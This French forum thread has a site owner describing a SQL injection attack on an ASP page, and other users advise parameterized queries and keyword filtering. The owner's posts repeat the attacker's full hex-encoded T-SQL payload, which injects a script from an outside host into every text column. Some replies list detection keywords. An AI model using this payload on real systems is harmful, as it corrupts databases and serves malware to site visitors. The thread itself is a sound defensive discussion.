Attaque sur ma base

Le
SQL
Bonjour,

Nous subissons des attaque sur notre base SQL par une page formulaire .asp
derriere laquelle il ajoute une requette SQL qui midifie les données du type
NVARCAR

Voici la requette

/configurateur.asp
search=1&mar_nom=IBM%20/%20LENOVO&ord_mod=ThinkPad&ord_serie90X%20Celeron%202626-9xx,Bxx,Fxx;DECLARE%20@S%20NVARCHAR(4000);SET%20@SÊST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E0071006900710069003100310031002E0063006E002F006D002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);

Comme les données sont criptées, cette requette ne peut pas etre bloquée et
je cherche le moyen d'y arriver.
Merci d'avance si vous avez la réponse.
Vidéos High-Tech et Jeu Vidéo
Téléchargements
Vos réponses
Gagnez chaque mois un abonnement Premium avec GNT : Inscrivez-vous !
Trier par : date / pertinence
Fred BROUARD
Le #11879961
Evitez d'utiliser le SQL dynamique et si cela vous est impératif, testé
le contenu dynamique.

Dans le pire des cas, rechercher les motifs suivants :
CAST
sysobjects
DECLARE
SET @
...

A +



SQL a écrit :
Bonjour,

Nous subissons des attaque sur notre base SQL par une page formulaire .asp
derriere laquelle il ajoute une requette SQL qui midifie les données du type
NVARCAR

Voici la requette

/configurateur.asp
search=1&mar_nom=IBM%20/%20LENOVO&ord_mod=ThinkPad&ord_serie90X%20Celeron%202626-9xx,Bxx,Fxx;DECLARE%%20NVARCHAR(4000);SET%ÊST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D


00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E0071006900710069003100310031002E0063006E002F006D002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F00720020004900
4E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);

Comme les données sont criptées, cette requette ne peut pas etre bloquée et
je cherche le moyen d'y arriver.
Merci d'avance si vous avez la réponse.






--
Frédéric BROUARD, MVP SQL Server, expert bases de données et langage SQL
Le site sur le langage SQL et les SGBDR : http://sqlpro.developpez.com
Audit, conseil, expertise, formation, modélisation, tuning, optimisation
*********************** http://www.sqlspot.com *************************
Fred
Le #11879951
Dans : news:,
SQL disait :
Bonjour,



Bonjour,

Nous subissons des attaque sur notre base SQL par une page formulaire
.asp derriere laquelle il ajoute une requette SQL qui midifie les
données du type NVARCAR



Ce n'est pas un problème à règler au niveau de SQL Server mais au niveau
du code de la page ASP pour éviter cette attaque dite «SQL Injection».
Il est fort probable que la requête soit construite par concaténation ce
qui est à proscrire sauf à bien analyser ce qu'on concatène. Pour
éliminer ce problème, utilisez plutôt les requêtes paramétrées .

--
Fred

Patrice
Le #11879941
Généralement l'idée est de ne jamais construire soi-même une chaine de
caractère basée sur des données fournies par l'utilisateur (car il peut les
trafiquer pour changer comme bon lui semble le contenu de cette chaine et
donc l'instruction SQL exécutée).

L'idée est plutôt d'exprimer la requête avec des paramètres qui seront
alimentés par l'API d'accès aux données (ADO, ADO.NET etc...) ce qui empêche
l'utilisateur d'intervenir sur autre chose que la valeur du paramètre.

Cf "injection SQL", "requêtre paramétrée" sur Google devrait remonter des
tonnes de liens. Dans l'immédiat tester peut être la présence de "EXEC(%)"
dans les données en attendant de voir tout cela en détails...

--
Patrice


"SQL"
Bonjour,

Nous subissons des attaque sur notre base SQL par une page formulaire .asp
derriere laquelle il ajoute une requette SQL qui midifie les données du
type NVARCAR

Voici la requette

/configurateur.asp
search=1&mar_nom=IBM%20/%20LENOVO&ord_mod=ThinkPad&ord_serie90X%20Celeron%202626-9xx,Bxx,Fxx;DECLARE%%20NVARCHAR(4000);SET%ÊST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E0071006900710069003100310031002E0063006E002F006D002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);

Comme les données sont criptées, cette requette ne peut pas etre bloquée
et je cherche le moyen d'y arriver.
Merci d'avance si vous avez la réponse.




Phil
Le #11879931
On 16 mai, 11:13, "SQL"
Bonjour,


Bonjour,
Cette attaque est décrite notamment ici : http://www.f-secure.com/weblog/a rchives/00001435.html
Pour se protéger des injections Sql, c'est par exemple ici :
http://msdn.microsoft.com/en-us/library/ms998271.aspx
Et sur cette page le script décodé et un moyen (faire des sauvegardes)
de nettoyer la base : http://hackademix.net/2008/04/26/mass-attack-faq/
Cordialement
Phil
SQL
Le #11879911
Merci a tous mais je me suis mal exprimé.

La page par laquelle les hacker attaquent est une page .asp contenant 2
formulaires dont l'action est cette même page.
L'intrussion est produite par la récupération de l'URL complet retourné par
request.querystring auquel les hackers ajoute le requette d'incertion dans
la base.
l'exemple que je vous donne n'est que la partie ajoutée par les hackers sur
l'url.

Si vous m'avez compris, je suis preneur de vos réponses......
Merci

"Fred"
Dans : news:,
SQL disait :
Bonjour,



Bonjour,

Nous subissons des attaque sur notre base SQL par une page formulaire
.asp derriere laquelle il ajoute une requette SQL qui midifie les
données du type NVARCAR



Ce n'est pas un problème à règler au niveau de SQL Server mais au niveau
du code de la page ASP pour éviter cette attaque dite «SQL Injection».
Il est fort probable que la requête soit construite par concaténation ce
qui est à proscrire sauf à bien analyser ce qu'on concatène. Pour éliminer
ce problème, utilisez plutôt les requêtes paramétrées .

--
Fred



Sylvain Lafontaine
Le #11879901
Vous vous êtes très bien exprimé et les réponses que vous avez reçues sont
la solution à votre problème. Vous êtes probablement (rien n'étant sûr à
100%) victime d'une attaque par injection SQL; vous devez donc immuniser
votre code contre ce type d'attaque.

--
Sylvain Lafontaine, ing.
MVP - Technologies Virtual-PC
E-mail: sylvain aei ca (fill the blanks, no spam please)


"SQL" news:
Merci a tous mais je me suis mal exprimé.

La page par laquelle les hacker attaquent est une page .asp contenant 2
formulaires dont l'action est cette même page.
L'intrussion est produite par la récupération de l'URL complet retourné
par request.querystring auquel les hackers ajoute le requette d'incertion
dans la base.
l'exemple que je vous donne n'est que la partie ajoutée par les hackers
sur l'url.

Si vous m'avez compris, je suis preneur de vos réponses......
Merci

"Fred"
Dans : news:,
SQL disait :
Bonjour,



Bonjour,

Nous subissons des attaque sur notre base SQL par une page formulaire
.asp derriere laquelle il ajoute une requette SQL qui midifie les
données du type NVARCAR



Ce n'est pas un problème à règler au niveau de SQL Server mais au niveau
du code de la page ASP pour éviter cette attaque dite «SQL Injection».
Il est fort probable que la requête soit construite par concaténation ce
qui est à proscrire sauf à bien analyser ce qu'on concatène. Pour
éliminer ce problème, utilisez plutôt les requêtes paramétrées .

--
Fred







SQL
Le #11879491
Merci a tous pour vos réponses.

Nous travaillons a corriger notre code.

Jean-Luc

"SQL"
Bonjour,

Nous subissons des attaque sur notre base SQL par une page formulaire .asp
derriere laquelle il ajoute une requette SQL qui midifie les données du
type NVARCAR

Voici la requette

/configurateur.asp
search=1&mar_nom=IBM%20/%20LENOVO&ord_mod=ThinkPad&ord_serie90X%20Celeron%202626-9xx,Bxx,Fxx;DECLARE%%20NVARCHAR(4000);SET%ÊST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E0071006900710069003100310031002E0063006E002F006D002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);

Comme les données sont criptées, cette requette ne peut pas etre bloquée
et je cherche le moyen d'y arriver.
Merci d'avance si vous avez la réponse.




helios services
Le #11879141
Fred BROUARD a écrit :
Evitez d'utiliser le SQL dynamique et si cela vous est impératif, testé
le contenu dynamique.

Dans le pire des cas, rechercher les motifs suivants :
CAST
sysobjects
DECLARE
SET @
...

A +



SQL a écrit :
Bonjour,

Nous subissons des attaque sur notre base SQL par une page formulaire
.asp derriere laquelle il ajoute une requette SQL qui midifie les
données du type NVARCAR

Voici la requette

/configurateur.asp
search=1&mar_nom=IBM%20/%20LENOVO&ord_mod=ThinkPad&ord_serie90X%20Celeron%202626-9xx,Bxx,Fxx;DECLARE%%20NVARCHAR(4000);SET%ÊST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003




D



00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E0071006900710069003100310031002E0063006E002F006D002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F00720020004


900

4E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);


Comme les données sont criptées, cette requette ne peut pas etre
bloquée et je cherche le moyen d'y arriver.
Merci d'avance si vous avez la réponse.








mais peut on faire confiance à quelqu'un qui prétends coder plus de
65536 valeurs sur 2 octets ?

http://groups.google.com/group/fr.comp.applications.sgbd/msg/621527f995585842?dmode=source





et donc les écrits ont été bannis de wikipedia

--
Dr Thierry HOLZ
HELIOS SERVICES
180 rue de la croix du chene
60250 HEILLES
www.openqm.com02.net
www.pick.com02.net
Publicité
Poster une réponse
Anonyme